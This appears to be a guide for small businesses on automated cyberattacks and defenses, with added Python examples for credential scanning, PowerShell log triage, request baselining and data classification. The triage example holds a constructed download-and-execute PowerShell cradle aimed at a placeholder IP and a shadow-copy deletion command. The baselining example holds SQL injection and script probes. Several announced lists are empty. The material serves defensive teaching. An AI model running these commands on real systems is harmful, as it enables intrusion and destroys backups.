In this guide you will learn about:
- Automated technologies used in cyberattacks
- Automated cyber-defense technologies and processes
- Automated defense technologies and solutions
- Advanced cyberdefense capabilities
- Engaging a third-party managed security services provider
For SMB owners, massive cyberattacks can seem like the faraway misfortune of international enterprises. But the tit-for-tat cybercrime war now pits increasingly sophisticated malicious actors against businesses of all sizes: smaller companies and SMBs, as well as solo professionals, professional practices, and remote knowledge workers.
To get the jump on security pros, cyber attackers use every tool they can lay their hands on, including automated tools, machine learning, and robotic process automation (RPA).
All business operators, no matter how modest their operations, ought to recognize cyberattacks and the risks that these exploits create. Even basic awareness of what normal network traffic and behavior look like strengthens defenses and reduces the risk of a successful attack.
This guide is designed for solo professionals, remote corporate workers, and members of professional practices—people who run modest networks, often with modest security budgets. It describes trends in cyberattacks and the defense measures that can reduce or avoid the damage that these exploits cause.
Thinking about DIY cybersecurity measures? Or perhaps, handing off cybersecurity duties to a third-party managed security services provider (MSSP)? If so, the detailed descriptions in this guide should help you understand what you are buying—or risking.
Several years ago, attacks enabled by the WannaCry and NotPetya malware captured the attention of cybercrime watchers everywhere. Designing and deploying advanced cybersecurity strategies to combat such threats became the need of the hour. Why? Times and cybercrime were changing:
For years, cybercriminals have tweaked malware so that security software cannot discover it or identify it as malicious. Large-scale threat intelligence efforts were launched to spot every variation of known malware and record its signature in databases, so that each instance could be identified and neutralized.
But identifying literally millions of malware samples is difficult, especially when they are deliberately disguised. Increasingly, security pros turned to machine learning to stop both familiar and new, unknown types of malware.
Knowing an effective tool when they see one, cybercriminals started using machine learning, too. Unfortunately, they adapt quickly and deliver software that is often more adaptable and sophisticated than that of legitimate developers. The bad guys have now built machine learning-enabled attacks and are using them against businesses and government agencies.
But this is old news. Automation and related technologies are familiar attacker tools. What makes automated cybercrime riskier for smaller-scale business operations?
A Europol report warns that artificial intelligence (AI) and other forms of automation could make cyberattacks more dangerous and more difficult to spot than ever. For example, machine learning-based malware can automatically send phishing email messages to learn what sort of language works best in cyberattacks and how to design attacks for specific types of targets.
Modern cyberattacks use several types of automation: robotic process automation, artificial intelligence, and machine learning, a specific subset of AI. Each contributes its own capabilities to finding, organizing, analyzing, and distributing huge volumes of data at lightning speeds.
Robotic process automation (RPA). RPA is a process in which software automates (outsources) boring, repetitive tasks, typically performed by humans, to other software programs or mechanical devices. RPA is important because it delegates manual, tedious tasks to bots, which perform them without a human having to monitor or control them.
RPA role in automated cybercrime. Outsourcing tasks to non-human workers saves enormous amounts of time and money and enables many tasks that humans cannot perform. (Example: Scanning 1.2 million instances of malware in a threat intelligence database.) However, the convenience that RPA provides encourages a “set it and forget it” mentality and all its security risks.
Bots often have access to sensitive network data and systems. RPA bots use privileged access to perform tasks, moving data between systems and processes, so a compromised bot is a handy pipeline into an organization’s data. Because bots need access to many applications, their credentials are often hard-coded into scripts or pulled from insecure locations such as plaintext configuration files or shared drives. These practices are common entry points for attackers. Bot credentials belong in a secrets vault, fetched at run time, scoped to the minimum access the task needs, and rotated on a schedule.
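The hard-coded credential problem is easy to check for. The scanner below is an added example written for this guide, not code from the page or from any RPA product: it flags the usual ways secrets end up inside bot scripts (a password assigned to a string literal, credentials in a connection string or URL, an AWS access key ID, private key material) and shows the hardened pattern beside it, where the bot resolves its secret at run time. The two bot scripts it scans are constructed samples; the regexes are heuristics the example's author chose, so a hit is a lead to review, not proof of a leak.

```python
"""Added example (not from the page or any RPA vendor): a heuristic scanner
that flags hard-coded credentials in RPA bot scripts.

Assumptions: bot scripts are Python-like text; the patterns are heuristics,
so every hit is a lead to review rather than proof of a leak.
"""
import os
import re

# Each entry is (label, regex). The regexes are deliberately loose: missing
# a real secret costs more than reviewing a false positive.
CREDENTIAL_PATTERNS = [
    ("secret assigned to a string literal",
     re.compile(r"""(?i)(password|passwd|pwd|secret|token|api[_-]?key)\w*\s*[:=]\s*["'][^"']{4,}["']""")),
    ("credentials embedded in a URL or connection string",
     re.compile(r"""(?i)://[^/\s:'"]+:[^@\s'"]+@|(?:password|pwd)=[^;\s'"]+""")),
    ("AWS access key ID", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("private key material",
     re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----")),
]


def find_hardcoded_credentials(source):
    """Return (line_number, label, line_text) for every line that matches
    one of CREDENTIAL_PATTERNS, in file order."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for label, pattern in CREDENTIAL_PATTERNS:
            if pattern.search(line):
                findings.append((lineno, label, line.strip()))
    return findings


def get_credential(name):
    """The hardened pattern: resolve the secret at run time from the
    environment (in production, from a secrets manager), never from the
    script body, and fail closed if it is missing."""
    value = os.environ.get(name)
    if not value:
        raise RuntimeError("credential %s not provided" % name)
    return value


# Constructed sample: the "set it and forget it" bot with everything inline.
# AKIAIOSFODNN7EXAMPLE is the placeholder key from AWS documentation.
VULNERABLE_BOT = '''\
# invoice_bot.py (constructed sample)
import pyodbc
DB_PASSWORD = "Summer2019!"
conn = pyodbc.connect("Driver={SQL Server};Server=finance-db;UID=rpa_svc;PWD=Summer2019!")
s3_key = "AKIAIOSFODNN7EXAMPLE"
ftp = "ftp://rpa_svc:Summer2019!@files.example.internal/inbox"
'''

# Constructed sample: the same bot after moving every secret out of the script.
HARDENED_BOT = '''\
# invoice_bot.py (constructed sample, hardened)
import os, pyodbc
def get_credential(name):
    value = os.environ.get(name)
    if not value:
        raise RuntimeError("credential %s not provided" % name)
    return value
conn = pyodbc.connect("Driver={SQL Server};Server=finance-db;UID=rpa_svc;PWD="
                      + get_credential("RPA_DB_PASSWORD"))
'''

if __name__ == "__main__":
    for name, script in (("vulnerable", VULNERABLE_BOT), ("hardened", HARDENED_BOT)):
        print(name)
        for lineno, label, text in find_hardcoded_credentials(script):
            print("  line %d: %s: %s" % (lineno, label, text))
```

Run against the vulnerable sample, the scanner reports four lines (the password assignment, the `PWD=` in the connection string, the AWS key, and the FTP URL); against the hardened sample it reports nothing, because the only secret the script knows is the name of an environment variable. Pointing the scanner at a real bot directory is the same loop over files; rotate anything it finds, since a secret that has sat in a script is best assumed copied.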
Machine learning is the ability of computers to adapt, learn, and respond to changes in their environment without being explicitly programmed for each specific task.
When it comes to modern cybercrime, machine learning takes center stage with machine learning-enabled attacks (MLEA). By using machine learning, hackers can automate some or all steps in the data breach process, including:
The security trade press notes these MLEA-related trends and predictions:
Cybercriminals now use AI to scale up their social engineering attacks and make them more efficient. Some forward-looking hackers are also using AI to identify new weaknesses in networks, devices, and applications as they emerge.
Because these tools rapidly identify opportunities for human hackers, keeping information secure becomes much tougher. Real-time monitoring of all network access and activity, combined with frequent, consistent patching, is now vital to combat these emerging threats.
The cloud isn’t an attack technology, but it provides a new and fertile IT environment in which automated cyberattacks occur with increasing frequency.
Small-office business operators often assume that a compromised cloud service causes less disruption than a compromised on-premises service does. This mistake can lead administrators and IT ops teams to cut corners on cloud infrastructure security.
There’s also a naïve belief that hosted service providers take responsibility for the security of client data. They do not: cloud-hosted services still require the same ongoing monitoring, risk management, backups, upgrades, and maintenance as traditional IT infrastructure does.
Attacks are now so highly automated that significant damage can be done in little time. This applies to attack targets and collateral damage (compromised servers are used to stage further attacks). If it’s been a while since you reviewed your cloud resource security, now is a good time.
So, what forms do automated cyberattacks take? When researchers studied underground cyber-economies, they listed 10 of the most common automation services that hackers use. Most of these tools and services are part of active hacking campaigns or are traded on dark-web forums. Why automate? It’s the simplest, fastest, most efficient way to launch more attacks and generate more profit.
Hackers who distribute stolen databases often use automation to select and offer the most valuable data (email addresses, payment card data, passwords, and other personal information).
But, as threat actors use automation to scale their efforts, network security defense teams are not sitting on their hands. They are using a similar approach and many of the same automated tools as the criminals.
Automation provides impressive defense capabilities to IT security professionals everywhere. Increasingly powerful cyber-defense measures can help organizations avoid or reduce the damage of cyberattacks, and automated tools and solutions make those measures more efficient and effective.
It’s safe to say that high-end hackers have gone corporate. With their own research budgets, 21st-century cyber-thieves constantly improve their products. Malicious software and processes are stealthier, smarter, and more able than ever to cripple IT infrastructures.
Criminals use cloud services and automated technology to speed up attacks, which shortens the time an enterprise has to identify and respond to a data breach or disruption attack. Security specialists constantly develop innovative ways to win much of that time back, using automated technologies to defend data and network infrastructure from harm.
Here’s the lineup of technologies that play important roles in cybersecurity defense.
Artificial intelligence/deep learning. AI plays an increasing role in cybersecurity. Data analytics tools engage in high-speed, high-volume processes to identify, gather, and analyze data from millions of cyber incidents. Results help to identify potential threats—an employee account acting strangely when someone clicks on a phishing link or a new malware variant, for example. AI now defends network cybersecurity by:
Deep learning-based tools detect threats or unwarranted activities by analyzing data such as logs, transaction data, and real-time communications.
Network behavior analysis. Behavioral analytics, the technique marketers use to target social media content and online advertisements at a carefully defined audience, also has a place in cybersecurity. Combined with machine learning methods, behavioral analytics helps security pros detect harmful patterns of system or network behavior and respond to cyberthreats in real time.
Internet-connected devices (IoT). IoT devices let organizations connect devices to networks and transfer data between them without human intervention. They drive automation, productivity, and efficiency, which makes them valuable in cybersecurity efforts. Each one is also an unattended, often rarely patched endpoint, so IoT devices need to be inventoried and kept on a segmented network.
Embedded authentication hardware. Embedded authenticators are emerging technologies that confirm a user’s identity. One early example, introduced in 2016 with Intel’s sixth-generation Core vPro processors, was claimed to offer better protection from interference and manipulation than software equivalents.
These user authentication tools are built into a device’s hardware, and each device uses several layers and authentication methods that work together. Interest in, and the market value of, this technology are growing rapidly.
Automating these IT processes gives organizations remarkable improvements in their cybersecurity defenses.
Detecting malware and disruptive activity. Good data governance, implemented through automated techniques, limits total risk when an incident happens. But you should also want to detect and stop an attack before it advances.
Unfortunately, modern malware such as Sodinokibi (also known as REvil) is hard to detect with conventional techniques such as signature-based virus scanners. One reason is that it leverages software already present on Windows, such as PowerShell and other standard utilities, so there is often no unfamiliar binary for a scanner to match; the malicious part is how legitimate tools are being used.
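When the tooling is legitimate, the telemetry that still gives the attack away is the command line. The script below is an added example written for this guide, not code from the page or from any security product: it reads process-creation style log lines, decodes any PowerShell `-EncodedCommand` argument (base64 of UTF-16LE, which is how PowerShell encodes it), and scores each line against a small set of living-off-the-land indicators. The log lines and the payload are constructed, and the indicator list and weights are a generic set chosen for the example, not a published Sodinokibi signature.

```python
"""Added example (not from the page or any vendor): triage PowerShell command
lines for living-off-the-land indicators of the kind ransomware uses.

Assumptions: the log lines below are constructed, and the indicator list is
a generic set the author of this example chose, not a published Sodinokibi
signature. Scores are heuristics; an alert means "look at this host now".
"""
import base64
import re

# (label, weight, regex). Weight 3 alerts on its own; routine admin noise
# such as a lone -ExecutionPolicy Bypass does not.
INDICATORS = [
    ("encoded command", 2,
     re.compile(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")),
    ("execution policy bypass", 1, re.compile(r"(?i)-ex\w*\s+bypass|-ep\s+bypass")),
    ("hidden window", 1, re.compile(r"(?i)-w\w*\s+hidden")),
    ("download cradle", 2,
     re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient")),
    ("in-memory execution", 1, re.compile(r"(?i)\b(?:iex|invoke-expression)\b")),
    ("shadow copy deletion", 3,
     re.compile(r"(?i)vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete")),
]
ALERT_THRESHOLD = 3
ENCODED_ARG = re.compile(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument (PowerShell encodes
    it as base64 of UTF-16LE), or "" if the line carries none."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze(cmdline):
    """Score one command line, looking at both the raw text and anything
    hidden inside an encoded command."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline + "\n" + decoded
    hits = [label for label, _, rx in INDICATORS if rx.search(haystack)]
    score = sum(w for label, w, _ in INDICATORS if label in hits)
    return {"line": cmdline, "decoded": decoded, "indicators": hits, "score": score}


def triage(lines):
    """Return the analyses that reach ALERT_THRESHOLD, most suspicious first."""
    alerts = [a for a in (analyze(l) for l in lines) if a["score"] >= ALERT_THRESHOLD]
    return sorted(alerts, key=lambda a: -a["score"])


# Constructed payload and log lines (process-creation style: time host user cmdline).
# 198.51.100.7 is a documentation address, not a real host.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")
LOG_LINES = [
    "2021-03-02T09:14:05Z WS-17 jsmith powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup-report.ps1",
    "2021-03-02T09:14:31Z WS-17 jsmith powershell.exe -NoProfile -WindowStyle Hidden -enc " + ENCODED,
    "2021-03-02T09:15:02Z WS-17 SYSTEM vssadmin.exe delete shadows /all /quiet",
    "2021-03-02T09:15:40Z WS-04 mlee powershell.exe -Command Get-ChildItem C:\\Users\\mlee\\Documents",
]

if __name__ == "__main__":
    for alert in triage(LOG_LINES):
        print("%2d  %s" % (alert["score"], ", ".join(alert["indicators"])))
        print("    %s" % alert["line"][:100])
        if alert["decoded"]:
            print("    decoded: %s" % alert["decoded"])
```

The nightly backup script on the first line scores 1 and stays quiet, even though it bypasses the execution policy; the hidden, encoded download cradle on the second line scores 6 once the base64 is decoded, and the shadow-copy deletion on the third line alerts on its own. None of this needs a malware signature, which is the point: what a scanner cannot match, command-line and script-block logging can still show.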
Responding to attacks in real time. Machine learning-based defensive software identifies and reacts to suspected problems almost immediately, preventing potential issues from disrupting business without relying on humans to monitor everything at once.
Advanced security software compares data describing current application behavior against a stored baseline. (For a web application, the baseline covers all aspects of normal behavior, such as directories, URLs, parameters, and acceptable user inputs.) Rules-based analysis determines whether the observed behavior is “safe”; if it isn’t, the software blocks the request within seconds.
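The baseline comparison is a positive security model: anything the application was never seen to do is refused. The check below is an added example written for this guide, not code from the page or from any WAF product. Its baseline of endpoints, parameter names and value patterns is constructed by hand (a real product learns it from observed traffic), and the sample requests, including the injection and script probes, are constructed too.

```python
"""Added example (not from the page or any WAF product): a positive-security
check that compares each web request against a stored baseline of the
application's normal behavior and blocks anything outside it.

Assumptions: the baseline below is constructed by hand; a real product learns
it from observed traffic. Paths, parameters and patterns are illustrative.
"""
import re
from dataclasses import dataclass, field

# Baseline: (method, path) -> {parameter: regex the value must fully match}.
# Every listed parameter is expected and nothing else is tolerated; that is
# the whole point of a positive model.
BASELINE = {
    ("GET", "/account"): {"id": r"\d{1,10}"},
    ("GET", "/search"): {"q": r"[\w .\-]{1,64}"},
    ("POST", "/login"): {"user": r"[a-z0-9_.]{3,32}", "password": r".{8,128}"},
}


@dataclass
class Decision:
    allowed: bool
    reasons: list = field(default_factory=list)


def evaluate_request(method, path, params):
    """Return a Decision; reasons list every baseline rule the request broke."""
    method = method.upper()
    path = path.rstrip("/") or "/"
    expected = BASELINE.get((method, path))
    if expected is None:
        return Decision(False, ["endpoint not in baseline: %s %s" % (method, path)])
    reasons = []
    for name in params:
        if name not in expected:
            reasons.append("unexpected parameter: %s" % name)
    for name, pattern in expected.items():
        if name not in params:
            reasons.append("missing parameter: %s" % name)
        elif not re.fullmatch(pattern, params[name], re.S):
            reasons.append("parameter %s does not match baseline" % name)
    return Decision(not reasons, reasons)


# Constructed traffic: normal use and a few probes a scanner would send.
SAMPLE_REQUESTS = [
    ("GET", "/account", {"id": "1042"}),
    ("GET", "/account", {"id": "1042 OR 1=1"}),
    ("GET", "/account", {"id": "7", "debug": "1"}),
    ("GET", "/search", {"q": "<script>alert(1)</script>"}),
    ("POST", "/admin/export", {}),
    ("POST", "/login", {"user": "alice", "password": "correct horse battery"}),
]

if __name__ == "__main__":
    for method, path, params in SAMPLE_REQUESTS:
        d = evaluate_request(method, path, params)
        print("%s %s %s -> %s %s" % (method, path, params,
                                     "ALLOW" if d.allowed else "BLOCK", d.reasons))
```

Only the two ordinary requests pass. The SQL injection probe fails because an account ID is, per the baseline, digits only; the `debug` parameter and the `/admin/export` path fail because the baseline never saw them; the script tag fails the character set allowed for a search term. The cost of this model is the one the paragraph implies: the baseline must be kept current, or legitimate new features get blocked along with the attacks.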
With their own R&D budgets, 21st-century cyber-thieves are always improving their product, making it faster, stealthier, and smarter about finding and deleting backups and crippling other defenses.
Finding sensitive data in millions of files, adjusting permissions, and then monitoring those enormous corporate file systems for threats is beyond the capabilities of IT teams unless they have significant help from software automation.
Uncovering new kinds of malware isn’t the only way machine learning can boost cybersecurity. Important capabilities also include:
One important first step is to have automated data governance practices: software for efficiently scanning file systems, determining employee access patterns, and then setting permissions that limit access to those who really need it.
In addition, cyber defense software should be able to classify corporate data to find sensitive information — credit card numbers, passwords, and other account data — and lock these files down with special permissions.
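The two steps above (classify the data, then lock it down) fit in one small pipeline. The script below is an added example written for this guide, not code from the page or from any data-governance product: it scans a constructed file share for payment card numbers, validated with the Luhn checksum so that order and phone numbers are not misreported, and for credentials, then strips broad groups such as Everyone from the permissions of anything it labels. The share contents, the ACLs and the "principal:rights" notation are all constructed for the example.

```python
"""Added example (not from the page or any DLP product): classify files on a
share by scanning for payment card numbers and credentials, then recommend
permissions that drop broad groups from anything sensitive.

Assumptions: the share contents and ACLs below are constructed; the ACL
notation "principal:rights" is invented for the example.
"""
import re

# Candidate card numbers: 13-19 digits, optionally separated by spaces/dashes.
CARD_CANDIDATE = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")
CREDENTIAL = re.compile(r"(?i)\b(?:password|passwd|pwd)\s*[:=]\s*\S+")
BROAD_PRINCIPALS = {"Everyone", "Domain Users", "Authenticated Users"}


def luhn_ok(digits):
    """Luhn checksum; filters out order numbers and phone numbers that merely
    look like card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def find_card_numbers(text):
    """Return Luhn-valid card numbers found in text, digits only, deduplicated."""
    found = []
    for m in CARD_CANDIDATE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group(0))
        if luhn_ok(digits) and digits not in found:
            found.append(digits)
    return found


def classify(text):
    """Labels for one document; an empty list means nothing sensitive was found."""
    labels = []
    if find_card_numbers(text):
        labels.append("payment-card")
    if CREDENTIAL.search(text):
        labels.append("credential")
    return labels


def recommend_permissions(acl, labels):
    """Keep the ACL as is for ordinary files; for sensitive ones, drop every
    broad group so only the named owning team keeps access."""
    if not labels:
        return list(acl)
    return [entry for entry in acl if entry.split(":")[0] not in BROAD_PRINCIPALS]


def scan_share(share):
    """share: {path: (contents, acl)} -> {path: {labels, acl_before, acl_after}}"""
    report = {}
    for path, (text, acl) in share.items():
        labels = classify(text)
        report[path] = {"labels": labels, "acl_before": list(acl),
                        "acl_after": recommend_permissions(acl, labels)}
    return report


# Constructed share. 4111 1111 1111 1111 and 5500 0000 0000 0004 are the
# well-known test numbers; 1234567890123 is a decoy that fails Luhn.
SHARE = {
    "finance/refunds-2020.txt": (
        "Refund to card 4111 1111 1111 1111 on 2020-11-03; also 5500000000000004",
        ["Everyone:R", "finance:RW"]),
    "it/legacy-setup.txt": (
        "smtp relay\npassword: Rel4y!2019\n",
        ["Domain Users:R", "it-admins:RW"]),
    "sales/q3-orders.txt": (
        "Order 1234567890123 shipped; contact sales@example.com",
        ["Everyone:R", "sales:RW"]),
}

if __name__ == "__main__":
    for path, row in scan_share(SHARE).items():
        print(path, row["labels"], row["acl_before"], "->", row["acl_after"])
```

The refunds file is labelled payment-card and loses its Everyone entry, the legacy setup note is labelled credential and loses Domain Users, and the sales order file, whose 13-digit order number fails the Luhn check, keeps its permissions unchanged. On a real share the same loop walks the directory tree, and the recommended ACLs are applied and then re-checked on a schedule, since permissions drift back as files are copied and shared.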
The benefits of using an infrastructure as a service (IaaS) provider are obvious. There’s no need to spend money to buy and maintain expensive servers and computing power to manage your data and IT operations. And you get a general sense that your data is safe. After all, it’s in the cloud, right?
Well, maybe. Business owners: take a long look at the fine print in your service contract. Your data might not be as thoroughly protected as you think.
When you put your data in the cloud, the IaaS (cloud hosting) provider is responsible for protecting the underlying infrastructure that holds your data and apps. You, the business owner, remain responsible for protecting your own data, accounts, and configurations. Look at this graphic. (Source: Amazon Web Services)
This model shows how security responsibility is divided between the customer and the cloud provider. The IaaS provider supports you with secure infrastructure, bandwidth, and disaster recovery, but it is up to you to understand where the provider’s responsibility stops and to protect your own information.
Security technical reports and white papers share a gloomy outlook for SMB owners. Small to mid-sized businesses continue to face a threat from cybercrime. And your chances of flying under the radar of cybercrooks are not good.
The recent demand for reliable security services has created one more as-a-service offering: the MSSP. Managed security services providers sell specialized cloud-based services to organizations of all sizes. MSSPs support some or all aspects of their clients’ security functions, which typically include some level of:
Before you groan, “But I can’t afford that!” consider this: In terms of time, money, and on-premises talent, can you afford to:
If you answer “no” to any of these questions, we understand. But ultimately, it all comes down to judging the costs of ongoing security support services versus the expected value of Something Going Terribly Wrong at your business.